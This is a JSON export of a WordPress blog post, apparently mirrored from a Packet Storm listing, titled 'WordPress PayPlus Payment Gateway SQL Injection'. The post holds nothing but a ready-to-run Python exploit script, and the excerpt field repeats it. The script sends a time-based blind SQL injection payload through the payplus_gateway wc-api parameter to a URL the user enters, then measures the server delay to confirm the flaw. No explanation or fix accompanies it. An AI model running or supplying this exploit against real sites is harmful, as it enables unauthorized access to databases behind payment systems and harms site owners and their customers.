{"id":58668,"date":"2024-08-07T18:30:01","date_gmt":"2024-08-07T15:30:01","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179961\/wppaypluspg-sql.txt"},"modified":"2024-08-07T18:30:01","modified_gmt":"2024-08-07T15:30:01","slug":"wordpress-payplus-payment-gateway-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-payplus-payment-gateway-sql-injection\/","title":{"rendered":"WordPress PayPlus Payment Gateway SQL Injection"},"content":{"rendered":"<p>#!\/usr\/bin\/env python3.11<br \/>import requests<br \/>import time<\/p>\n<p>def exploit(url):<br \/>payload = {&#8220;wc-api&#8221;: &#8220;payplus_gateway&amp;status_code=true&amp;more_info=(select*from(select(sleep(5)))a)&#8221;}<\/p>\n<p>start = time.time()<br \/>with requests.Session() as session:<br \/>session.headers.update({<br \/>&#8216;User-Agent&#8217;: &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/58.0.3029.110 Safari\/537.3&#8217;<br \/>})<br \/>response = requests.get(url, params=payload)<br \/>print(f&#8221;Exploiting {url}&#8230;&#8221;)<\/p>\n<p>end = time.time()<br \/>print(response.status_code)<br \/>response_time = end &#8211; start<br \/>print(f&#8221;Response time: {response_time}&#8230;&#8221;)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>url = input(&#8220;Enter the vulnerable URL (e.g., https:\/\/test.site): &#8220;)<br \/>if not url.startswith(&#8220;http&#8221;):<br \/>url = &#8220;http:\/\/&#8221; + url<br \/>exploit(url)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>#!\/usr\/bin\/env python3.11import requestsimport time def exploit(url):payload = {&#8220;wc-api&#8221;: &#8220;payplus_gateway&amp;status_code=true&amp;more_info=(select*from(select(sleep(5)))a)&#8221;} start = time.time()with requests.Session() as session:session.headers.update({&#8216;User-Agent&#8217;: &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/58.0.3029.110 Safari\/537.3&#8217;})response = requests.get(url, params=payload)print(f&#8221;Exploiting {url}&#8230;&#8221;) end = time.time()print(response.status_code)response_time = end &#8211; startprint(f&#8221;Response time: {response_time}&#8230;&#8221;) if __name__ == &#8220;__main__&#8221;:url = input(&#8220;Enter the vulnerable URL (e.g., https:\/\/test.site): &#8220;)if not url.startswith(&#8220;http&#8221;):url = &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58668","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58668","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58668"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58668\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58668"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58668"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58668"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}